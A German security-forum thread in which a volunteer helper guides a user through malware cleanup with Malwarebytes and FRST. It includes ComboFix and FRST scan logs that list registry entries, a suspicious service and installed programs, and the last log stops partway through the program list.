AddRemove-Native Instruments Traktor Kontrol X1 Driver - c:\programdata\{018F1C44-00D1-417B-B251-92A5634F74AE}\Traktor Kontrol X1 Driver Setup PC.exe
AddRemove-Native Instruments Traktor Kontrol X1 MK2 Driver - c:\programdata\{9B09061B-0A4F-42DA-9987-7D3F452DCB09}\Traktor Kontrol X1 MK2 Driver Setup PC.exe
AddRemove-Native Instruments Traktor Kontrol Z1 Driver - c:\programdata\{9597097D-B8DC-4754-AF2D-CB61CCFC861A}\Traktor Kontrol Z1 Driver Setup PC.exe
AddRemove-Native Instruments Traktor Kontrol Z2 Driver - c:\programdata\{EB21323D-3F46-4EF0-B849-B096B7705C69}\Traktor Kontrol Z2 Driver Setup PC.exe
AddRemove-{013CCA52-DA56-4133-AC2B-1988A9568C30} - c:\programdata\{4682E4CB-7209-4099-8AA1-580ABCCCE731}\Audio 4 DJ Driver Setup PC.exe
AddRemove-{0886900B-B2F3-452C-B580-60F1253F7F80} - c:\programdata\{07D05344-6233-4934-88BF-C7E4EEFF9D28}\Controller Editor Setup PC.exe
AddRemove-{0B8565BA-BAD5-4732-B122-5FD78EFC50A9} - c:\programdata\{90D8CE90-3E6B-4034-A281-BC9F19B60A5B}\Service Center Setup PC.exe
AddRemove-{1FF959F4-8993-4c52-A397-0CB982C91954} - c:\programdata\{AD2628D6-C822-4033-AC55-33D833EF2EC9}\Traktor Kontrol S8 Driver Setup PC.exe
AddRemove-{23A66953-369C-4d22-A189-C6E403D4A19F} - c:\programdata\{033B4844-E9C3-45D2-88D9-34DDF3F91100}\Audio 2 DJ Driver Setup PC.exe
AddRemove-{24873332-B98B-4235-ABBA-CCDEACC62BB9} - c:\programdata\{662EAAEC-9E9A-4C69-A658-884E51E909BB}\Traktor Audio 6 Driver Setup PC.exe
AddRemove-{28F19F09-F228-49cb-8B90-F97DA7180DD4} - c:\programdata\{B7C85E99-2AC6-455D-B4D1-752A56403757}\Traktor Kontrol S4 Driver Setup PC.exe
AddRemove-{2AAC4085-DCBF-417B-AEBD-182197839240} - c:\programdata\{47803536-1938-4D3F-86D6-F4876B645542}\Traktor Setup PC.exe
AddRemove-{3054FEFA-4748-4cf0-8C3C-8DB887DE379F} - c:\programdata\{0CC85DFF-E70A-4AB0-968A-F1F98F4D0C67}\Traktor Audio 2 Driver Setup PC.exe
AddRemove-{3D8003CE-E3CD-49b7-A59E-9C21546AF95E} - c:\programdata\{9F570B21-E27A-40BE-A508-292899A7D042}\Traktor Kontrol S2 Driver Setup PC.exe
AddRemove-{47047AA6-C62D-4334-B9CB-84E0630269EC} - c:\programdata\{AF79C86B-2321-4D47-A168-2A24BA2B6A73}\Traktor Kontrol S2 MK2 Driver Setup PC.exe
AddRemove-{470BB39A-7231-4077-AD3D-86067AD04604} - c:\programdata\{D2030082-F62A-402A-9456-8009276FD896}\Audio 8 DJ Driver Setup PC.exe
AddRemove-{612601db-4776-4127-bab5-d84b8644e530} - c:\programdata\{018F1C44-00D1-417B-B251-92A5634F74AE}\Traktor Kontrol X1 Driver Setup PC.exe
AddRemove-{7ADD3C28-6348-4940-8C10-9ED751F1A543} - c:\programdata\{219191E6-6846-4329-889D-7956C487D9A6}\Traktor Kontrol F1 Driver Setup PC.exe
AddRemove-{7B8BA774-C154-4DEE-A92D-D0E7236BB152} - c:\programdata\{B3478C15-588A-4968-AD66-76AA98803A28}\Traktor Audio 2 MK2 Driver Setup PC.exe
AddRemove-{938FA945-D818-48A1-BE66-6921B0D649CF} - c:\programdata\{EB21323D-3F46-4EF0-B849-B096B7705C69}\Traktor Kontrol Z2 Driver Setup PC.exe
AddRemove-{99640eec-4d74-4df5-95f4-719dc27de6a8} - c:\program files (x86)\Lavasoft\Web Companion\Application\WebCompanionInstaller.exe
AddRemove-{A8EC0CC0-AD8D-4244-B080-424EDF7A7634} - c:\programdata\{9E7BD413-9B42-4EEC-96F4-6FF3CF9791A2}\Traktor 2 Setup PC.exe
AddRemove-{B861B550-23FD-4E56-9D7F-4E81AFE2B639} - c:\programdata\{8D4C602D-E844-4297-BB00-303F1AFBDCBE}\Traktor Kontrol D2 Driver Setup PC.exe
AddRemove-{C39B8892-BB8B-4B0C-AFA6-7B6EE897B286} - c:\programdata\{57B31BE2-3175-4425-9722-D2AC5F68C7BD}\Traktor Kontrol S4 MK2 Driver Setup PC.exe
AddRemove-{CD79F608-0EEC-4e8b-A8A3-98A9CB723702} - c:\programdata\{9597097D-B8DC-4754-AF2D-CB61CCFC861A}\Traktor Kontrol Z1 Driver Setup PC.exe
AddRemove-{D18B6F23-0B79-448C-9739-29A03843D660} - c:\programdata\{9B09061B-0A4F-42DA-9987-7D3F452DCB09}\Traktor Kontrol X1 MK2 Driver Setup PC.exe
.
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\zuroluxy]
"ImagePath"="c:\program files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs"
.
--------------------- Gesperrte Registrierungsschluessel ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_18_0_0_232_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_18_0_0_232_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_18_0_0_232_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_18_0_0_232_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_18_0_0_232.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.18"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_18_0_0_232.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_18_0_0_232.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_18_0_0_232.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
------------------------ Weitere laufende Prozesse ------------------------
.
c:\program files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
c:\program files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\program files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
c:\windows\SysWOW64\PnkBstrA.exe
.
**************************************************************************
.
Zeit der Fertigstellung: 2015-09-21  18:38:38 - PC wurde neu gestartet
ComboFix-quarantined-files.txt  2015-09-21 16:38
.
Vor Suchlauf: 13 Verzeichnis(se), 73.854.971.904 Bytes frei
Nach Suchlauf: 19 Verzeichnis(se), 75.190.906.880 Bytes frei
.
- - End Of File - - B840A83B98C11AB4375A0BE6C9BACBB0
A36C5E4F47E84449FF07ED3517B43A31
         


Alt 22.09.2015, 11:01   #6
burningice
/// Malwareteam
 
Malware-gen, Adware-gen ...usw - Standard

Malware-gen, Adware-gen ...usw



Hallo Zympop,

danke, für Deine gute Mitarbeit bisher.
Bitte bis zum Ende der Bereinigung keine Scans unaufgefordert durchführen und/oder Programme de-/installieren.
Bitte folge den Anweisungen solange, bis ich dir deutlich sage, dass dein PC sauber ist! Nur weil die Symptome verschwunden sind, bedeutet das nicht, dass auch die Infektion entfernt ist!

Danke dir!


Schritt 1
Starte bitte wieder Malwarebytes Anti-Malware
  • Unter Einstellungen/ Erkennung und Schutz setze bitte einen Haken bei "Suche nach Rootkits".
  • Klicke im Anschluss auf Durchsuchen, wähle den Bedrohungssuchlauf aus und klicke auf Suchlauf starten.
  • Lass am Ende des Suchlaufs alle Funde (falls vorhanden) in die Quarantäne verschieben. Klicke dazu auf Auswahl entfernen.
  • Lass deinen Rechner ggf. neu starten, um die Bereinigung abzuschließen.
  • Starte MBAM, klicke auf Verlauf und dann auf Anwendungsprotokolle.
  • Wähle das neueste Suchlaufprotokoll aus und klicke auf Export. Wähle Textdatei (.txt) aus und speichere die Datei als mbam.txt auf dem Desktop ab. Das Logfile von MBAM findest du hier.
  • Füge den Inhalt der mbam.txt mit deiner nächsten Antwort hinzu.

Schritt 2
Bitte starte wieder FRST, setze den Haken bei Addition und drücke auf Untersuchen

Bitte poste in deiner nächsten Antwort also:
  • Log von Malwarebytes
  • Frst.txt
  • Addition.txt
__________________
--> Malware-gen, Adware-gen ...usw

Alt 24.09.2015, 19:45   #7
burningice
/// Malwareteam
 
Malware-gen, Adware-gen ...usw - Standard

Malware-gen, Adware-gen ...usw



Hallo,
benötigst Du noch weiterhin Hilfe ?

Sollte ich innerhalb der nächsten 24 Stunden keine Antwort von dir erhalten, werde ich dein Thema aus meinen Abos nehmen und bekomme dadurch keine Nachricht über neue Antworten.

Das Verschwinden der Symptome bedeutet nicht, dass dein System schon sauber ist
__________________
Mfg,
Rafael

~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~

Unterstütze uns mit einer Spende
......... Lob, Kritik oder Wünsche .........
.......... Folge uns auf Facebook ..........

Alt 26.09.2015, 11:57   #8
Zympop
 
Malware-gen, Adware-gen ...usw - Standard

Malware-gen, Adware-gen ...usw



Hallo Burning.

vielen dank für deine hilfe bis jetzt =)


Addition
Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:23-09-2015
durchgeführt von Kenny G (2015-09-23 05:00:52)
Gestartet von C:\Users\Kenny G\Downloads
Windows 7 Ultimate (X64) (2013-10-01 16:18:55)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-682121585-3582832733-1082443493-500 - Administrator - Disabled)
eLoot (S-1-5-21-682121585-3582832733-1082443493-1008 - Administrator - Enabled) => C:\Users\eLoot
Gast (S-1-5-21-682121585-3582832733-1082443493-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-682121585-3582832733-1082443493-1002 - Limited - Enabled)
Kenny G (S-1-5-21-682121585-3582832733-1082443493-1000 - Administrator - Enabled) => C:\Users\Kenny G
Tabea Studium (S-1-5-21-682121585-3582832733-1082443493-1009 - Limited - Enabled) => C:\Users\Tabea Studium
UpdatusUser (S-1-5-21-682121585-3582832733-1082443493-1007 - Limited - Enabled) => C:\Users\UpdatusUser

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: AVG Internet Security 2015 (Enabled - Up to date) {4D41356F-32AD-7C42-C820-63775EE4F413}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG Internet Security 2015 (Enabled - Up to date) {F620D48B-1497-73CC-F290-58052563BEAE}
FW: AVG Internet Security 2015 (Enabled) {757AB44A-78C2-7D1A-E37F-CA42A037B368}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

888poker (HKLM-x32\...\888poker) (Version:  - )
aborange Crypter - Deinstallation (HKLM-x32\...\aborange Crypter_is1) (Version: 3.10 - Mathias Gerlach [aborange.de])
Adobe Flash Player 18 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 18.0.0.232 - Adobe Systems Incorporated)
Adobe Flash Player 18 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated)
Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.12) - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AB0000000001}) (Version: 11.0.12 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2EF5D87E-B7BD-458F-8428-E4D0B8B4E65C}) (Version: 7.0.0.117 - Apple Inc.)
Auslogics DiskDefrag (HKLM-x32\...\{DF6A13C0-77DF-41FE-BD05-6D5201EB0CE7}_is1) (Version: 4.4.2.0 - Auslogics Labs Pty Ltd)
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.6140 - AVG Technologies)
AVG 2015 (Version: 15.0.4419 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.6140 - AVG Technologies) Hidden
AVG Web TuneUp (HKLM-x32\...\AVG Web TuneUp) (Version: 4.1.6.294 - AVG Technologies)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Battlefield: Bad Company 2 (HKLM-x32\...\Steam App 24960) (Version:  - DICE)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 4.06 - Piriform)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.5.5571 - CDBurnerXP)
Cliqz (HKLM-x32\...\{5A0C0737-6AFE-4DC6-A8B4-6DFE509ACD75}_is1) (Version: 0.5.31 - Cliqz.com)
Counter-Strike (HKLM-x32\...\Steam App 10) (Version:  - Valve)
Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version:  - Valve)
CyberGhost 5 (HKLM\...\CyberGhost 5_is1) (Version:  - CyberGhost S.R.L.)
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.1.0.0074 - Disc Soft Ltd)
Free Alarm Clock 3.1.0 (HKLM-x32\...\{8ED5A2F1-338F-4608-8AF7-BCD1ADC1E1F7}_is1) (Version: 3.1 - Comfort Software Group)
Free YouTube Download version 3.2.61.805 (HKLM-x32\...\Free YouTube Download_is1) (Version: 3.2.61.805 - DVDVideoSoft Ltd.)
Free YouTube to MP3 Converter version 3.12.61.805 (HKLM-x32\...\Free YouTube to MP3 Converter_is1) (Version: 3.12.61.805 - DVDVideoSoft Ltd.)
GIMP 2.8.10 (HKLM\...\GIMP-2_is1) (Version: 2.8.10 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 45.0.2454.93 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.28.15 - Google Inc.) Hidden
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
ICQ 8.2 (build 6901) (HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\ICQ) (Version: 8.2.6901.0 - ICQ)
ICQ 8.2 (build 6901) (HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\ICQ) (Version: 8.2.6901.0 - ICQ)
iTunes (HKLM\...\{A535111D-95C8-487F-869E-CE4C239972D2}) (Version: 11.1.1.11 - Apple Inc.)
Java 7 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217021FF}) (Version: 7.0.450 - Oracle)
JetBoost (HKLM-x32\...\JetBoost_is1) (Version: 2.0.0 - BlueSprig)
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games )
League of Legends (x32 Version: 3.0.1 - Riot Games ) Hidden
LibreOffice 4.2.2.1 (HKLM-x32\...\{0ECDB550-79ED-4E9E-851B-19A8B2B4EBFA}) (Version: 4.2.2.1 - The Document Foundation)
Malwarebytes Anti-Malware Version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Extended DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Mozilla Firefox 40.0.3 (x86 de) (HKLM-x32\...\Mozilla Firefox 40.0.3 (x86 de)) (Version: 40.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 40.0.3.5716 - Mozilla)
Mozilla Thunderbird 24.6.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 24.6.0 (x86 de)) (Version: 24.6.0 - Mozilla)
Native Instruments Audio 2 DJ Driver (HKLM-x32\...\Native Instruments Audio 2 DJ Driver) (Version:  - Native Instruments)
Native Instruments Audio 4 DJ Driver (HKLM-x32\...\Native Instruments Audio 4 DJ Driver) (Version:  - Native Instruments)
Native Instruments Audio 8 DJ Driver (HKLM-x32\...\Native Instruments Audio 8 DJ Driver) (Version:  - Native Instruments)
Native Instruments Controller Editor (HKLM-x32\...\Native Instruments Controller Editor) (Version: 1.8.2.281 - Native Instruments)
Native Instruments Service Center (HKLM-x32\...\Native Instruments Service Center) (Version: 2.6.0.137 - Native Instruments)
Native Instruments Traktor (HKLM-x32\...\Native Instruments Traktor) (Version:  - Native Instruments)
Native Instruments Traktor 2 (HKLM-x32\...\Native Instruments Traktor 2) (Version: 2.9.0.1257 - Native Instruments)
Native Instruments Traktor Audio 2 Driver (HKLM-x32\...\Native Instruments Traktor Audio 2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Audio 2 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Audio 2 MK2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Audio 6 Driver (HKLM-x32\...\Native Instruments Traktor Audio 6 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol D2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol D2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol F1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol F1 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol S2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol S2 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S2 MK2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol S4 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S4 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol S4 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S4 MK2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol S8 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S8 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol X1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol X1 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol X1 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol X1 MK2 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol Z1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol Z1 Driver) (Version:  - Native Instruments)
Native Instruments Traktor Kontrol Z2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol Z2 Driver) (Version:  - Native Instruments)
NVIDIA 3D Vision Controller-Treiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 331.65 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 331.65 - NVIDIA Corporation)
NVIDIA Grafiktreiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 331.65 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.13.0725 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.0725 - NVIDIA Corporation)
NVIDIA Virtual Audio 1.2.9 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_VirtualAudio.Driver) (Version: 1.2.9 - NVIDIA Corporation)
Opera Stable 32.0.1948.25 (HKLM-x32\...\Opera 32.0.1948.25) (Version: 32.0.1948.25 - Opera Software)
Pidgin (HKLM-x32\...\Pidgin) (Version: 2.10.7 - )
pidgin-otr 4.0.0-1 (HKLM-x32\...\pidgin-otr) (Version: 4.0.0-1 - Cypherpunks CA)
Poker 770 (HKLM-x32\...\Poker 770) (Version:  - )
PokerStars.eu (HKLM-x32\...\PokerStars.eu) (Version:  - PokerStars.eu)
Project 64 version 2.1.0.1 (HKLM-x32\...\Project 64_is1) (Version: 2.1.0.1 - )
SHIELD Streaming (Version: 1.6.34 - NVIDIA Corporation) Hidden
Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.)
SleepTimer Ultimate 1.2 (HKLM-x32\...\{0EE56463-49B2-45E1-B74F-3E0139DBC986}_is1) (Version:  - Christian Handorf)
Sony Mobile Update Engine (HKLM-x32\...\Update Engine) (Version: 2.13.13.201311261136 - Sony Mobile Communications AB)
Sony PC Companion 2.10.188 (HKLM-x32\...\{F09EF8F2-0976-42C1-8D9D-8DF78337C6E3}) (Version: 2.10.188 - Sony)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - )
